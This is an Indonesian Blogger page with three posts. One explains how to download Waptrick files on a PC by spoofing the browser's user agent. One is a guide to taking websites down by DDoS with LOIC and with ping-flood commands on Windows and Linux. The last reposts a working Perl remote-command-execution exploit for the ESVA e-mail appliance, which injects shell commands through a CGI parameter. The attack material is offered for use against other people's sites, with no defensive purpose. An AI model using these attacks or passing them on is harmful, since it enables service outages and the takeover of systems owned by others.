BloggerMates

FOLLOWERS

[ Categories ]

[ Followers ]

Image

[ Partner Link ]

[ Recent Comments ]

Arnoldi-Technology

[ Advertiser ]

Code HTML/Isi Widget kalian
Diberdayakan oleh Blogger.

Cara Download File Di Waprtick.com Lewat PC/Laptop




Sobat bingung ya mau download file waptrick ,mau download melalui PC ga tau caranya.soalnya kan waptrick.com hanya bisa melalui Handphone .Sekarang saya ada solusinya untuk bisa download di PC

Caranya:

1. Download add-on nya dulu disini [Download]

2. Setelah terinstall pilih user agent iphone 3.0
    Caranya gini:
    pilih Tool-Default user agent-Iphone 3.0

3. Habis itu coba deh buka waptrick.com bisa gak?? pasti bisa [yang gk bisa MAHO]

4. Tapi ntar kalo sobat mau download file waptricknya , formatnya kan jad? gini caranya:
pertama soba buka file jad tersebut dengan notepad (klik kanan file yang di download-open with-choose                            program-pilih notepad-ok) habis itu cari yand ada linknya kira-kira seperti contoh ini: http://94.101.90.251/games/nok240x320m2/been10.jar.jar

5.Udah selesai deh
bisa kan

NB:HARUS PAKEK MOZILA FIREFOX"

Cara DDOS Website Agar Cepat Down with LOIC


serangan DDoS Attack adalah serangan yang dilakukan pada server dengan cara membanjiri server dengan request ping atau request lainya dalam jumlah yang sangat banyak. serangan ini tidka dapat dicegah karena memang keroyokan alias ya berdo’a saja supaya situs kita tidak down akibat kena serangan DDoS Attack. ada pun cara untuk melakukan DDoS Attack sangat-sangat mudah, bahkan anak SMP pun bisa melakukanya. untuk mereka yang menggunakan OS Windows dapat menggunakan dua cara. cara pertama adalah dengan menggunakan software bernama Low Orbit Ion Cannonprogram ini tidak perlu diinstall cukup jalankan seperti program portable lainya.
Download Software nya DISINI
1. Jalankan program
2. Setelah muncul Jendela di bagian URL masukan situs yang ingin diserang misalkan www.coba.com, lalu klik lock on
3. setelah itu klik tombol IMMA CHARGIN MAH LAZER
4. silakan lihat hasilnya dibawah, disana terdapat keterangan berapa jumlah packet yang connecting, requesting, downloading, downloaded, requested  dan failed.
5. jika berhasil berarti berarti pada bagian yang failed seharusnya banyak , yang menandakan bahwa server telah down.




cara kedua adalah dengan membanjiri Ping melalui command promt alias CMD. buka start->run dan ketikan cmd, atau tekan kombinasi tombol Windows + R dan ketik cmd, kemudian enter. setelah jendela Command Prompt muncul ketikan
#ping target.com
setelah itu akan muncul nomor ip dari situs tersebut, anggaplah nomor ip adalah 192.168.1.1, kemudian saatnya melakukan serangan ke sistem server hosting target.com.
#ping 192.168.1.1 -l 39999 -n 10000000 -w 0.00001
yang berarti :
n = besarnya Ping , nilai “10000000″ silakan diubah sesuai dengan yang diinginkan .
192.168.1.1= ganti alamat ip dari situs target.com
-W 0,00001 = Ini adalah periode waktu tunggu antar satu ping.
dua cara tadi jika anda di windows, bagaimana jika di linux, hal ini jauh lebih mudah untuk dilakukan tapi hal pertama yang harus dimiliki adalah hak sebagai root. silakan ketika command ini di terminal linux.
#sudo ping -f 192.168.1.1
system akan melakukan ping sebanyak yang bisa dibuat, biasanya 10.000/menit, jika respondnya adalah Host Unreachable dll, berarti system telah down. untuk alamat 192.168.1.1 silakan ganti dengan alamat ip situs target.com.
Selamat mencoba dan Try With Yout Own Risk.
Sumber

E-Mail Security Virtual Appliance (ESVA) Exploit.


Exploit Title: E-Mail Security Virtual Appliance (ESVA) Remote Execution.
# Date: 10 Aug 2012
# Exploit Author: iJoo
# Vendor Homepage: http://www.esvacommunity.com/
# Software Link: http://sourceforge.net/projects/esva-project/
# Version: < 2.0.6
ESVA (E-Mail Security Virtual Appliance) is a pre-built and semi-configured email scanning appliance that will run on VMware Workstation, Server, Player or ESX Server.
-=+ Infected Files
…./cgi-bin/learn-msg.cgi
…./cgi-bin/release-msg.cgi
Not found any strips/filter to metacharacters..
Attacker can easily execute command..
-=+ Simple RCE ESVA
#! /usr/bin/perl
use LWP;
use HTTP::Request;
if (@ARGV < 1)
{
print “\n==========================================\n”;
print “   ESVA – REMOTE EXECUTION SCRIPT \n”;
print “==========================================\n”;
print “Usage: perl esva.pl host (without http://)\n”;
print “Ex. perl esva.pl www.korban.com\n”;
exit;
}
$host=$ARGV[0];
print “Try to Execution Command!\n”;
print “iDSc-shell# “;
chomp( $cmd = <STDIN>);
while($cmd !~ “exit”)
{
$content = “”;
$ua = LWP::UserAgent->new();
$ua->agent(”);
$request = HTTP::Request->new (GET => “http://”.$host.”/cgi-bin/learn-msg.cgi?id=%7c”.$cmd.”%3b”);
$response = $ua->request ($request);
$content = $response->content;
print $content.”\n”;
print “iDSc-shell# “;
chomp( $cmd = <STDIN>);
}